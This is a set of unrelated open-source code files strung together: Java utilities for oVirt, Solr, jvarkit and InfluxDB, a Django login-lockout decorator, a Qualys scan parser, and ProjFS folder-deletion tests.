<gh_stars>100-1000 package org.ovirt.engine.core.common.vdscommands; import org.ovirt.engine.core.common.utils.ToStringBuilder; import org.ovirt.engine.core.compat.Guid; public class NbdServerVDSParameters extends VdsIdVDSCommandParametersBase { private Guid serverId; private Guid storageDomainId; private Guid imageId; private Guid volumeId; private boolean readonly; private boolean detectZeroes; private boolean discard; // If true, export entire backing chain under specified volume. Otherwise // export only the specified volume. private boolean backingChain = true; private Guid bitmap; public NbdServerVDSParameters() { } public NbdServerVDSParameters(Guid vdsId) { super(vdsId); } public Guid getServerId() { return serverId; } public void setServerId(Guid serverId) { this.serverId = serverId; } public Guid getStorageDomainId() { return storageDomainId; } public void setStorageDomainId(Guid storageDomainId) { this.storageDomainId = storageDomainId; } public Guid getImageId() { return imageId; } public void setImageId(Guid imageId) { this.imageId = imageId; } public Guid getVolumeId() { return volumeId; } public void setVolumeId(Guid volumeId) { this.volumeId = volumeId; } public boolean isReadonly() { return readonly; } public void setReadonly(boolean readonly) { this.readonly = readonly; } public boolean isDetectZeroes() { return detectZeroes; } public void setDetectZeroes(boolean detectZeroes) { this.detectZeroes = detectZeroes; } public boolean isDiscard() { return discard; } public void setDiscard(boolean discard) { this.discard = discard; } public boolean getBackingChain() { return backingChain; } public void setBackingChain(boolean backingChain) { this.backingChain = backingChain; } public Guid getBitmap() { return bitmap; } public void setBitmap(Guid bitmap) { this.bitmap = bitmap; } @Override protected ToStringBuilder appendAttributes(ToStringBuilder tsb) { return super.appendAttributes(tsb) .append("serverId", serverId) .append("storageDomainId", storageDomainId) .append("imageId", imageId) .append("volumeId", volumeId) .append("readonly", readonly) .append("discard", discard) .append("detectZeroes", detectZeroes) .append("backingChain", backingChain) .append("bitmap", bitmap); } }
1,140
1,104
<filename>trunk/adhoc-solr/src/main/java/org/apache/solr/core/DirectoryFactory.java package org.apache.solr.core; /** * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import java.io.File; import java.io.IOException; import org.apache.lucene.store.Directory; import org.apache.solr.common.util.NamedList; import org.apache.solr.util.plugin.NamedListInitializedPlugin; /** * Provides access to a Directory implementation. * */ public abstract class DirectoryFactory implements NamedListInitializedPlugin { /** * Opens a Lucene directory * * @throws IOException */ public abstract Directory open(String path) throws IOException; public boolean exists(String path) { // back compat behavior File dirFile = new File(path); return dirFile.canRead(); } public void init(NamedList args) { } }
447
355
<gh_stars>100-1000 /* The MIT License (MIT) Copyright (c) 2021 <NAME> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ package com.github.lindenb.jvarkit.tools.biostar; import java.io.BufferedReader; import java.io.IOException; import java.nio.file.Path; import java.util.Collection; import java.util.HashMap; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Set; import java.util.stream.Collectors; import com.github.lindenb.jvarkit.util.bio.SequenceDictionaryUtils; import com.github.lindenb.jvarkit.util.jcommander.Launcher; import com.github.lindenb.jvarkit.util.jcommander.Program; import com.github.lindenb.jvarkit.util.log.Logger; import com.github.lindenb.jvarkit.util.picard.SAMSequenceDictionaryProgress; import htsjdk.samtools.Cigar; import htsjdk.samtools.SAMFileHeader; import htsjdk.samtools.CigarElement; import htsjdk.samtools.CigarOperator; import htsjdk.samtools.SamReader; import htsjdk.samtools.SAMFileWriter; import htsjdk.samtools.SAMReadGroupRecord; import htsjdk.samtools.SAMRecord; import htsjdk.samtools.SAMRecordIterator; import htsjdk.samtools.SAMSequenceDictionary; import htsjdk.samtools.util.CloserUtil; import htsjdk.samtools.util.Interval; import htsjdk.samtools.util.IntervalTreeMap; import com.beust.jcommander.Parameter; import com.beust.jcommander.ParametersDelegate; import com.github.lindenb.jvarkit.io.IOUtils; import com.github.lindenb.jvarkit.lang.CharSplitter; import com.github.lindenb.jvarkit.lang.JvarkitException; import com.github.lindenb.jvarkit.lang.StringUtils; /** BEGIN_DOC The program removes all the existing read group and create some new one from the 'position file'. For now, only simple alleles are supported. Reads group are affected if a specific variant is found in the 'position file'. If two samples share the same group, the read group is AMBIGOUS. If the read is unmapped, the read group is UNMAPPED. If no sample is affected to a read, the read group will be UNAFFECTED; ## see also: * [https://www.biostars.org/p/283969](https://www.biostars.org/p/283969) " How to extract reads with a known variant form a bam file" ## Example the positions file ``` $ cat positions.tsv rotavirus 267 C SAMPLE1 rotavirus 267 G SAMPLE2 ``` processing : ``` $ java -jar dist/biostar214299.jar -p positions.tsv input.bam @HD VN:1.5 SO:coordinate @SQ SN:rotavirus LN:1074 @RG ID:UNAFFECTED SM:UNAFFECTED LB:UNAFFECTED @RG ID:UNMAPPED SM:UNMAPPED LB:UNMAPPED @RG ID:SAMPLE1 SM:SAMPLE1 LB:SAMPLE1 @RG ID:SAMPLE2 SM:SAMPLE2 LB:SAMPLE2 @RG ID:AMBIGOUS SM:AMBIGOUS LB:AMBIGOUS (...) rotavirus_237_744_6:0:0_3:0:0_29c 163 rotavirus 237 60 70M = 675 508 ATCCGGCGTTAAATGGAAAGTTTCGGTGATCTATTAGAAATAGAAATTGGATGACTGATTCAAAAACGGT ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ MD:Z:3A19A1C1C1G31T8 RG:Z:SAMPLE1 NM:i:6 AS:i:41 XS:i:0 rotavirus_234_692_6:0:1_4:0:0_3ac 163 rotavirus 237 60 6S30M5I1M5D28M = 623 456 TTGGTAATCAGGCGTTAAATGGAAAGTTTAGCTCAGGACAACGAAATAGAAATTGGATGACTGATTCTAA ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ MD:Z:31^TATTA28 RG:Z:SAMPLE2 NM:i:10 AS:i:37 XS:i:0 rotavirus_237_777_6:0:0_7:0:0_216 99 rotavirus 237 60 70M = 708 541 ATCAGGGGTTAAATTGAAAGTTTAGCTCAGCTCTTAGACATAGAAATTGGATGACTGATTGTACAACGGT ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ MD:Z:6C7G17A5A21C2A6 RG:Z:SAMPLE1 NM:i:6 AS:i:40 XS:i:0 rotavirus_237_699_3:0:0_8:0:0_22f 163 rotavirus 237 60 70M = 650 463 ATGAGGCGTTAAATGGAAAGTTTATCTCAGCTATTAGAAATAGCAATTGGATGACTGATTCTAAAACGGT ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ MD:Z:2C21G18A26 RG:Z:SAMPLE1 NM:i:3 AS:i:57 XS:i:0 (...) rotavirus_311_846_10:0:0_11:0:0_3d7 141 * 0 0 * * 0 0 AACTTAGATGAAGACGATCAAAACCTTAGAATGACTTTATGTTCTAAATGGCTCGACCCAAAGATGAGAG ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ RG:Z:UNMAPPED AS:i:0 XS:i:0 rotavirus_85_600_7:0:0_9:0:0_3e0 77 * 0 0 * * 0 0 AGCTGCAGTTGTTTCTGCTCCTTCAACATTAGAATTACTGGGTATTGAATATGATTCCAATGAAGTCTAT ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ RG:Z:UNMAPPED AS:i:0 XS:i:0 rotavirus_85_600_7:0:0_9:0:0_3e0 141 * 0 0 * * 0 0 TATTTCTCCTTAAGCCTGTGTTTTATTGCATCAAATCTTTTTTCAAACTGCTCATAACGAGATTTCCACT ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ RG:Z:UNMAPPED AS:i:0 XS:i:0 ``` ## Cited In * Anatomy, transcription dynamics and evolution of wheat ribosomal RNA loci deciphered by a multi-omics approach. https://doi.org/10.1101/2020.08.29.273623 * Reciprocal allopolyploid grasses (Festuca × Lolium) display stable patterns of genome dominance . Marek Glombik & al. 2021. The plant journal. doi:10.1111/tpj.15375 END_DOC */ @Program(name="biostar214299", description="Extract allele specific reads from bamfiles", biostars=214299, keywords={"sam","bam","variant","snp"}, creationDate="20160930", modificationDate="20200924" ) public class Biostar214299 extends Launcher { private static final Logger LOG = Logger.build(Biostar214299.class).make(); @Parameter(names={"-o","--output"},description=OPT_OUPUT_FILE_OR_STDOUT) private Path outputFile = null; @Parameter(names={"-p","--positions"},description="Position file. A Tab delimited file containing the following 4 column: (1)chrom (2)position (3) allele A/T/G/C (4) sample name.",required=true) private Path positionFile = null; @Parameter(names={"-R","--reference"},description=CRAM_INDEXED_REFENCE) private Path reference = null; @ParametersDelegate private WritingBamArgs writingBamArgs = new WritingBamArgs(); private static class Position { //String contig; int refpos; final Map<Character,String> base2sample = new HashMap<>(); @Override public String toString() { return "pos:"+this.refpos+" "+this.base2sample; } } @Override public int doWork(final List<String> args) { if(this.positionFile==null) { LOG.error("position File is not defined."); return -1; } final String UNAFFECTED_SAMPLE="UNAFFECTED"; final String AMBIGOUS_SAMPLE="AMBIGOUS"; final String UNMAPPED="UNMAPPED"; SamReader sfr=null; SAMFileWriter sfw=null; final IntervalTreeMap<Position> positionsTreeMap = new IntervalTreeMap<>(); final Set<String> samples = new HashSet<>(); try { sfr = openSamReader(oneFileOrNull(args)); final SAMFileHeader header=sfr.getFileHeader(); final SAMSequenceDictionary dict = SequenceDictionaryUtils.extractRequired(header); try ( BufferedReader br = IOUtils.openPathForBufferedReading(this.positionFile)) { String line; final CharSplitter tab = CharSplitter.TAB; while((line=br.readLine())!=null) { if(StringUtils.isBlank(line) || line.startsWith("#")) continue; final String tokens[]=tab.split(line); if(tokens.length<4) { LOG.error("Not enough columns in "+line); return -1; } final String contig = tokens[0]; if(dict.getSequence(contig)==null) { LOG.error(JvarkitException.ContigNotFoundInDictionary.getMessage(contig, dict)); return -1; } final int refpos = Integer.parseInt(tokens[1]); final Interval interval = new Interval(contig, refpos, refpos); Position position = positionsTreeMap.get(interval); if(position==null) { position = new Position(); //position.contig = contig; position.refpos = refpos; positionsTreeMap.put(interval, position); } final String bases = tokens[2].toUpperCase(); if(bases.length()!=1 || !bases.matches("[ATGC]")) { LOG.error("in "+line+" bases should be one letter and ATGC"); return -1; } if(position.base2sample.containsKey(bases.charAt(0))) { LOG.error("in "+line+" bases already defined for this position"); return -1; } final String sampleName = tokens[3].trim(); if(sampleName.isEmpty()) { LOG.error("sample name cannot be empty"); return -1; } samples.add(sampleName); position.base2sample.put(bases.charAt(0), sampleName); } } catch (final IOException err) { LOG.error(err); return -1; } if(samples.contains(UNAFFECTED_SAMPLE)) { LOG.error("Sample cannot be named "+UNAFFECTED_SAMPLE); return -1; } if(samples.contains(AMBIGOUS_SAMPLE)) { LOG.error("Sample cannot be named "+AMBIGOUS_SAMPLE); return -1; } if(samples.contains(UNMAPPED)) { LOG.error("Sample cannot be named "+UNMAPPED); return -1; } samples.add(UNAFFECTED_SAMPLE); samples.add(AMBIGOUS_SAMPLE); samples.add(UNMAPPED); final SAMFileHeader newHeader = new SAMFileHeader(); newHeader.setSortOrder(header.getSortOrder()); newHeader.setSequenceDictionary(dict); newHeader.addComment("generated with "+getProgramName()+" "+getVersion()+" <NAME> : "+getProgramCommandLine()); /* create groups */ for(final String sample: samples) { final SAMReadGroupRecord rg = new SAMReadGroupRecord(sample); rg.setSample(sample); rg.setLibrary(sample); newHeader.addReadGroup(rg); } sfw = this.writingBamArgs.setReferencePath(this.reference).openSamWriter(this.outputFile,newHeader, true); final SAMSequenceDictionaryProgress progress= new SAMSequenceDictionaryProgress(header).logger(LOG); final SAMRecordIterator iter = sfr.iterator(); while(iter.hasNext()) { final SAMRecord rec = progress.watch(iter.next()); rec.setAttribute("RG",null); if(rec.getReadUnmappedFlag()) { rec.setAttribute("RG",UNMAPPED); sfw.addAlignment(rec); continue; } final Cigar cigar = rec.getCigar(); final Collection<Position> snps = positionsTreeMap.getContained(new Interval(rec.getContig(),rec.getUnclippedStart(),rec.getUnclippedEnd())); if(snps== null || snps.isEmpty()) { rec.setAttribute("RG",UNAFFECTED_SAMPLE); sfw.addAlignment(rec); continue; } final Map<Integer,Position> index2pos= snps.stream(). collect(Collectors.toMap(P->P.refpos,P->P)); final Set<String> selectedSamples = new HashSet<>(); final byte bases[] =rec.getReadBases(); if(bases==null || bases.equals(SAMRecord.NULL_SEQUENCE)) { LOG.error("Bases missing in read "+rec); return -1; } int refPos1=rec.getUnclippedStart(); int readPos0=0; for(final CigarElement ce:cigar.getCigarElements()) { final CigarOperator op = ce.getOperator(); final boolean consummeReadBaseOrSoftClip= op.consumesReadBases() || op.equals(CigarOperator.S); if(op.consumesReferenceBases() && consummeReadBaseOrSoftClip) { for(int i=0;i< ce.getLength();++i){ final int nowRefPos1 = (refPos1+i); final int nowReadPos0 = (readPos0+i); final Position position = index2pos.get(nowRefPos1); if(position==null) continue; if(nowReadPos0>= bases.length) continue; final char base = (char)Character.toUpperCase(bases[nowReadPos0]); final String sample = position.base2sample.get(base); if(sample==null) continue; selectedSamples.add(sample); index2pos.remove(nowRefPos1); if(index2pos.isEmpty()) break; } } if(op.consumesReferenceBases() || op.isClipping()) { refPos1+=ce.getLength(); } if(consummeReadBaseOrSoftClip) { readPos0+=ce.getLength(); } } if(selectedSamples.isEmpty()) { rec.setAttribute("RG",UNAFFECTED_SAMPLE); } else if(selectedSamples.size()==1) { rec.setAttribute("RG",selectedSamples.iterator().next()); } else { rec.setAttribute("RG",AMBIGOUS_SAMPLE); } sfw.addAlignment(rec); } progress.finish(); return 0; } catch(final Throwable err) { LOG.error(err); return -1; } finally { CloserUtil.close(sfr); CloserUtil.close(sfw); } } public static void main(final String[] args) { new Biostar214299().instanceMainWithExit(args); } }
5,748
417
from . import utils import functools def watch_login(status_code=302, msg="", get_username=utils.get_username_from_request): """ Used to decorate the django.contrib.admin.site.login method or any other function you want to protect by brute forcing. To make it work on normal functions just pass the status code that should indicate a failure and/or a string that will be checked within the response body. """ def decorated_login(func): @functools.wraps(func) def wrapper(request, *args, **kwargs): # if the request is currently under lockout, do not proceed to the # login function, go directly to lockout url, do not pass go, # do not collect messages about this login attempt if utils.is_already_locked(request): return utils.lockout_response(request) # call the login function response = func(request, *args, **kwargs) if request.method == "POST": # see if the login was successful if status_code == 302: # standard Django login view login_unsuccessful = ( response and not response.has_header("location") and response.status_code != status_code ) else: # If msg is not passed the last condition will be evaluated # always to True so the first 2 will decide the result. login_unsuccessful = ( response and response.status_code == status_code and msg in response.content.decode("utf-8") ) # ideally make this background task, but to keep simple, # keeping it inline for now. utils.add_login_attempt_to_db( request, not login_unsuccessful, get_username ) if utils.check_request(request, login_unsuccessful, get_username): return response return utils.lockout_response(request) return response return wrapper return decorated_login
1,033
32,544
<reponame>DBatOWL/tutorials<gh_stars>1000+ package com.baeldung.nulls; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.Test; import static org.junit.jupiter.api.Assertions.assertDoesNotThrow; import static org.junit.jupiter.api.Assertions.assertThrows; class UsingObjectsUnitTest { private UsingObjects classUnderTest; @BeforeEach public void setup() { classUnderTest = new UsingObjects(); } @Test public void whenArgIsNull_thenThrowException() { assertThrows(NullPointerException.class, () -> classUnderTest.accept(null)); } @Test public void whenArgIsNonNull_thenDoesNotThrowException() { assertDoesNotThrow(() -> classUnderTest.accept("test ")); } }
281
1,772
<gh_stars>1000+ import logging from datetime import datetime import html2text from dateutil import parser from defusedxml import ElementTree from dojo.models import Endpoint, Finding logger = logging.getLogger(__name__) def htmltext(blob): h = html2text.HTML2Text() h.ignore_links = False return h.handle(blob) def issue_r(raw_row, vuln, scan_date): ret_rows = [] issue_row = {} # IP ADDRESS issue_row['ip_address'] = raw_row.get('value') # FQDN issue_row['fqdn'] = raw_row.get('name') if issue_row['fqdn'] == "No registered hostname": issue_row['fqdn'] = None # port _port = raw_row.get('port') # Create Endpoint if issue_row['fqdn']: ep = Endpoint(host=issue_row['fqdn']) else: ep = Endpoint(host=issue_row['ip_address']) # OS NAME issue_row['os'] = raw_row.findtext('OS') # Scan details - VULNS//VULN indicates we only care about confirmed vulnerabilities for vuln_cat in raw_row.findall('VULNS/CAT'): _category = str(vuln_cat.get('value')) for vuln_details in vuln_cat.findall('VULN'): _temp = issue_row _gid = vuln_details.get('number') _temp['port_status'] = _port _result = str(vuln_details.findtext('RESULT')) # Vuln name _temp['vuln_name'] = vuln_details.findtext('TITLE') # Vuln Description _description = str(vuln_details.findtext('DIAGNOSIS')) # Solution Strips Heading Workaround(s) _temp['solution'] = htmltext(str(vuln_details.findtext('SOLUTION'))) # Vuln_description _temp['vuln_description'] = "\n".join([htmltext(_description), htmltext("**Category:** " + _category), htmltext("**QID:** " + str(_gid)), htmltext("**Port:** " + str(_port)), htmltext("**Result Evidence:** " + _result), ]) # Impact description _temp['IMPACT'] = htmltext(str(vuln_details.findtext('CONSEQUENCE'))) # CVE and LINKS _cl = [] _temp_cve_details = vuln_details.iterfind('CVE_ID_LIST/CVE_ID') if _temp_cve_details: _cl = {cve_detail.findtext('ID'): cve_detail.findtext('URL') for cve_detail in _temp_cve_details} _temp['cve'] = "\n".join(list(_cl.keys())) _temp['links'] = "\n".join(list(_cl.values())) # The CVE in Qualys report might not have a CVSS score, so findings are informational by default # unless we can find map to a Severity OR a CVSS score from the findings detail. sev = qualys_convert_severity(vuln_details.get('severity')) refs = "\n".join(list(_cl.values())) finding = Finding(title=_temp['vuln_name'], mitigation=_temp['solution'], description=_temp['vuln_description'], severity=sev, references=refs, impact=_temp['IMPACT'], vuln_id_from_tool=_gid, date=scan_date, ) finding.unsaved_endpoints = list() finding.unsaved_endpoints.append(ep) ret_rows.append(finding) return ret_rows def qualys_convert_severity(raw_val): val = str(raw_val).strip() if '1' == val: return 'Info' elif '2' == val: return 'Low' elif '3' == val: return 'Medium' elif '4' == val: return 'High' elif '5' == val: return 'Critical' else: return 'Info' class QualysInfrascanWebguiParser(object): def get_scan_types(self): return ["Qualys Infrastructure Scan (WebGUI XML)"] def get_label_for_scan_types(self, scan_type): return scan_type # no custom label for now def get_description_for_scan_types(self, scan_type): return "Qualys WebGUI output files can be imported in XML format." def get_findings(self, file, test): data = ElementTree.parse(file).getroot() # fetch scan date e.g.: <KEY value="DATE">2020-01-30T09:45:41Z</KEY> scan_date = datetime.now() for i in data.findall('HEADER/KEY'): if i.get('value') == 'DATE': scan_date = parser.isoparse(i.text) master_list = [] for issue in data.findall('IP'): master_list += issue_r(issue, data, scan_date) return master_list
2,464
32,544
package com.baeldung.dddhexagonalspring.domain.repository; import com.baeldung.dddhexagonalspring.domain.Order; import java.util.Optional; import java.util.UUID; public interface OrderRepository { Optional<Order> findById(UUID id); void save(Order order); }
96
1,152
#include "stdafx.h" #include "ProjFS_DeleteFolderTest.h" #include "SafeHandle.h" #include "TestException.h" #include "TestHelpers.h" #include "TestVerifiers.h" #include "Should.h" using namespace TestHelpers; using namespace TestVerifiers; static const std::string TEST_ROOT_FOLDER("\\GVFlt_DeleteFolderTest"); // -------------------- // // Special note on "EmptyFolder". In our tests, this folder actually has a single empty file because Git // does not allow committing empty folders. // // -------------------- bool ProjFS_DeleteVirtualNonEmptyFolder_SetDisposition(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeleteVirtualNonEmptyFolder_SetDisposition\\"); DWORD error = DelFolder(testScratchRoot + "NonEmptyFolder"); VERIFY_ARE_EQUAL((DWORD)ERROR_DIR_NOT_EMPTY, error); std::vector<std::string> expected = { "EmptyFolder", "NonEmptyFolder", "TestFile.txt" }; ExpectDirEntries(testScratchRoot, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot)); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "EmptyFolder")); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + "NonEmptyFolder")); } catch (TestException&) { return false; } return true; } bool ProjFS_DeleteVirtualNonEmptyFolder_DeleteOnClose(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeleteVirtualNonEmptyFolder_DeleteOnClose\\"); DWORD error = DelFolder(testScratchRoot + "NonEmptyFolder", false); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, error); std::vector<std::string> expected = { "EmptyFolder", "NonEmptyFolder", "TestFile.txt" }; ExpectDirEntries(testScratchRoot, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot)); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "EmptyFolder")); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + "NonEmptyFolder")); } catch (TestException&) { return false; } return true; } bool ProjFS_DeletePlaceholderNonEmptyFolder_SetDisposition(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeletePlaceholderNonEmptyFolder_SetDisposition\\"); // make it a placeholder folder EnumDirectory(testScratchRoot + "NonEmptyFolder"); DWORD error = DelFolder(testScratchRoot + "NonEmptyFolder"); VERIFY_ARE_EQUAL((DWORD)ERROR_DIR_NOT_EMPTY, error); std::vector<std::string> expected = { "EmptyFolder", "NonEmptyFolder", "TestFile.txt" }; ExpectDirEntries(testScratchRoot, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot)); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "EmptyFolder")); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + "NonEmptyFolder")); } catch (TestException&) { return false; } return true; } bool ProjFS_DeletePlaceholderNonEmptyFolder_DeleteOnClose(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeletePlaceholderNonEmptyFolder_DeleteOnClose\\"); // make it a placeholder folder EnumDirectory(testScratchRoot + "NonEmptyFolder"); DWORD error = DelFolder(testScratchRoot + "NonEmptyFolder", false); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, error); std::vector<std::string> expected = { "EmptyFolder", "NonEmptyFolder", "TestFile.txt" }; ExpectDirEntries(testScratchRoot, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot)); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "EmptyFolder")); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + "NonEmptyFolder")); } catch (TestException&) { return false; } return true; } bool ProjFS_DeleteLocalEmptyFolder_SetDisposition(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeleteLocalEmptyFolder_SetDisposition\\"); // create a new local folder CreateDirectoryWithIntermediates(testScratchRoot + "localFolder\\"); DWORD error = DelFolder(testScratchRoot + "localFolder"); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, error); std::vector<std::string> expected = { "EmptyFolder", "NonEmptyFolder", "TestFile.txt" }; ExpectDirEntries(testScratchRoot, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot)); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "EmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder\\" + "bar.txt")); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + "NonEmptyFolder")); } catch (TestException&) { return false; } return true; } bool ProjFS_DeleteLocalEmptyFolder_DeleteOnClose(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeleteLocalEmptyFolder_DeleteOnClose\\"); // create a new local folder CreateDirectoryWithIntermediates(testScratchRoot + "localFolder\\"); DWORD error = DelFolder(testScratchRoot + "localFolder", false); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, error); std::vector<std::string> expected = { "EmptyFolder", "NonEmptyFolder", "TestFile.txt" }; ExpectDirEntries(testScratchRoot, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot)); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "EmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder\\" + "bar.txt")); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + "NonEmptyFolder")); } catch (TestException&) { return false; } return true; } bool ProjFS_DeleteNonRootVirtualFolder_SetDisposition(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeleteNonRootVirtualFolder_SetDisposition\\"); std::string testFolder = "A\\B\\C\\D\\"; std::string targetFolder = "E\\"; std::string testFile = "test.txt"; // NOTE: Deviate from ProjFS's DeleteNonRootVirtualFolder_SetDisposition here by deleting a file first // Git will not allow empty folders to be commited, and so \E must have a file in it DWORD fileError = DelFile(testScratchRoot + testFolder + targetFolder + testFile); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, fileError); DWORD error = DelFolder(testScratchRoot + testFolder + targetFolder); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, error); std::vector<std::string> expected = {}; ExpectDirEntries(testScratchRoot + testFolder, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + testFolder)); VERIFY_ARE_EQUAL(false, DoesFileExist(testScratchRoot + testFolder + targetFolder)); } catch (TestException&) { return false; } return true; } bool ProjFS_DeleteNonRootVirtualFolder_DeleteOnClose(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeleteNonRootVirtualFolder_DeleteOnClose\\"); std::string testFolder = "A\\B\\C\\D\\"; std::string targetFolder = "E\\"; std::string testFile = "test.txt"; // NOTE: Deviate from ProjFS's DeleteNonRootVirtualFolder_DeleteOnClose here by deleting a file first // Git will not allow empty folders to be commited, and so \E must have a file in it DWORD fileError = DelFile(testScratchRoot + testFolder + targetFolder + testFile); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, fileError); DWORD error = DelFolder(testScratchRoot + testFolder + targetFolder, false); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, error); std::vector<std::string> expected = {}; ExpectDirEntries(testScratchRoot + testFolder, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + testFolder)); VERIFY_ARE_EQUAL(false, DoesFileExist(testScratchRoot + testFolder + targetFolder)); } catch (TestException&) { return false; } return true; }
3,919
1,024
package org.influxdb.querybuilder; import java.util.ArrayList; import java.util.List; import org.influxdb.querybuilder.clauses.AndConjunction; import org.influxdb.querybuilder.clauses.Clause; import org.influxdb.querybuilder.clauses.ConjunctionClause; import org.influxdb.querybuilder.clauses.OrConjunction; public class WhereCoreImpl<T extends Select> implements Select, Where { private final List<ConjunctionClause> clauses = new ArrayList<>(); private final T statement; WhereCoreImpl(final T statement) { this.statement = statement; } @Override public WhereCoreImpl and(final Clause clause) { clauses.add(new AndConjunction(clause)); return this; } @Override public WhereCoreImpl or(final Clause clause) { clauses.add(new OrConjunction(clause)); return this; } @Override public WhereCoreImpl where() { return statement.where(); } @Override public WhereCoreImpl where(final Clause clause) { return statement.where(clause); } @Override public WhereCoreImpl where(final String text) { return statement.where(text); } @Override public List<ConjunctionClause> getClauses() { return clauses; } @Override public WhereNested andNested() { return new WhereNested<>(this, false); } @Override public WhereNested orNested() { return new WhereNested<>(this, true); } @Override public SelectCoreImpl orderBy(final Ordering orderings) { return statement.orderBy(orderings); } @Override public SelectCoreImpl groupBy(final Object... columns) { return statement.groupBy(columns); } @Override public SelectCoreImpl fill(final Number value) { return statement.fill(value); } @Override public SelectCoreImpl fill(final String value) { return statement.fill(value); } @Override public SelectCoreImpl limit(final int limit) { return statement.limit(limit); } @Override public SelectCoreImpl limit(final int limit, final long offSet) { return statement.limit(limit, offSet); } @Override public SelectCoreImpl sLimit(final int sLimit) { return statement.sLimit(sLimit); } @Override public SelectCoreImpl sLimit(final int sLimit, final long sOffSet) { return statement.sLimit(sLimit, sOffSet); } @Override public SelectCoreImpl tz(final String timezone) { return statement.tz(timezone); } }
767
445
